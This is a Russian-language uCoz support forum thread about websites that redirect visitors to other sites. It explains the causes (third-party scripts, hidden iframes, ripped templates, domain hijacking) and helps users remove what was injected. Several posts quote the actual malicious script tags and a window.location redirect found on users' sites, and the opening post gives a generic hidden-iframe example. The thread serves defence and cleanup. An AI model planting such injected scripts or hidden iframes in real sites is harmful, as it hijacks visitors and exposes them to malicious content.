Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
При заходе на сайт перекидывает на другой
Модератор форума
Сообщение # 1 | 22:42:16
Описание проблемы:

При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом


Причины возникновения:

1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки
Если вы ставите к себе на сайт скрипт подобного вида
Code
<script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script>

где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные
Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность

2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе
Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой
Code
<iframe src="http://levyisite.ru" width="1" height="1"></iframe>

Где levyisite.ru - это адрес чужого сайта
а
Code
width="1" height="1"
может иметь значения 0
Code
width="0" height="0"
что означает фоновую (скрытую)подгрузку, то это на 100% агрессивный вредоносный код
Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов

3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность

4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес


Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем
Olmer1357
Сообщений: 1
Репутация: 0

Сообщение # 556 | 01:15:38
Прошу помочь с удалением порнобанеров, совсем одолели! Сайт ussracd.ucoz.ru. Судя по всему виноват этот скрипт:
"<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8s1tfa059ua8pic8ogfy3173ytn2d4h247hqzdngnqs5mkl'></script>"
Быстрая замена не находит этот скрипт. Как и куда соваться не представляю, т.к. нубас в этих вопросах.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 557 | 01:25:35
Olmer1357, откройте блок с меню сайта на редактирование и удалите скрипт

Код
<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8s1tfa059ua8pic8ogfy3173ytn2d4h247hqzdngnqs5mkl'></script>


если делаете быструю замену, то ставьте галку на замену в глобальных блоках тоже

после удаления смените пароль uid профиля. инструкции тут //forum.ucoz.ru/forum/45-52299-1

обязательна к прочтению эта тема //forum.ucoz.ru/forum/45-57475-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 558 | 19:02:15
Huntr174, ваш сайт не относится к системе юкоз. обратитесь за помощью к своему хостеру

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
gribowa71
Сообщений: 2
Репутация: 0

Сообщение # 559 | 17:29:02
У меня такая же проблема перебрасывает на сайт http://mlgame.ru/ мой сайт borsosch2.ucoz.ru, прочитала вашу тему, но где прячется эта зараза не нашла(
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 560 | 18:26:06
gribowa71, удалите скрипт из первого контейнера в блоке статистики


Код
<script>window.location="http://ad.admitad.com/goto/1e4fcc3b0bff3253a616feba1a4143/";</script>
gribowa71
Сообщений: 2
Репутация: 0

Сообщение # 561 | 20:12:56
Спасибо, все заработало!!!
romashka360
Сообщений: 1
Репутация: 0

Сообщение # 562 | 17:02:40
Всем доброго времени суток. Второй день перекидывает на http://ww2.plachetde.biz/?folio=7POYGN0G2 в админку вообще не могу зайти.
Адрес сайта http://vkusno-123.com/

Подскажите как гадость эту найти....

Проблема решина, гадость пряталась в нижнем контейнере.
Сообщение отредактировал romashka360 - Понедельник, 12 Май 2014, 17:18:29
LSK6240
Сообщений: 1
Репутация: 2

Сообщение # 563 | 14:31:48
У меня тоже с моего сайта www.astrology.at.ua перекидывает на другой... Как исправить?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 564 | 14:37:20
LSK6240, с помощью быстрой замены удалите скрипт
Код
<script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>
и смените все пароли

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
PermVelikaya
Сообщений: 2
Репутация: 0

Сообщение # 565 | 00:29:31
Мой сайт: PV.moy.su. При просмотре под гостем, при попытке открыть любую страницу из меню - перекидывает на: http://jump15.jump-wap.com/jump_redirect?id=1f322730-c7ef-4aeb-a2ad-f5af3e69f0e5. Главная страница открывается нормально. При заходе под логином - открывается нормально всё.
Что делать?
БУК
Сообщений: 3
Репутация: 0

Сообщение # 566 | 22:14:43
Здравствуйте! Мой сайтgou-spobta.ucoz.ru, при переходе по любой ссылке меню (как гость) открывается сайт http://wap.megafonpro.ru/is3nwp....68aeb%2 6serviceid%3D36videos%26transactid%3D14836-27855cfd-def6-45c9-9eb0-bab9fe70c196&status=new&new_if&context=trid_14836-27855cfd-def6-45c9-9eb0-bab9fe70c196. Помогите, сайт учебного заведения!
Lumore
Сообщений: 211
Репутация: 18

Сообщение # 567 | 22:28:38
БУК, открыл, потыкал меню, ничего не перенаправляет.. Проверьте компьютер на вирусы
Сообщение отредактировал Lumore - Вторник, 08 Июл 2014, 22:28:55
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 568 | 22:28:49
БУК, если сайт посвящен образованию, читаем тему //forum.ucoz.ru/forum/30-42718-1

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 569 | 22:35:11
Lumore, а вы, прежде чем советы давать, почитайте тему //forum.ucoz.ru/forum/45-40389-1
вас точно перекидывать не будет

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 570 | 18:26:30
SheFF4909, ваш сайт не относится к системе юкоз. обратитесь за помощью к своему хостеру

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой
Поиск: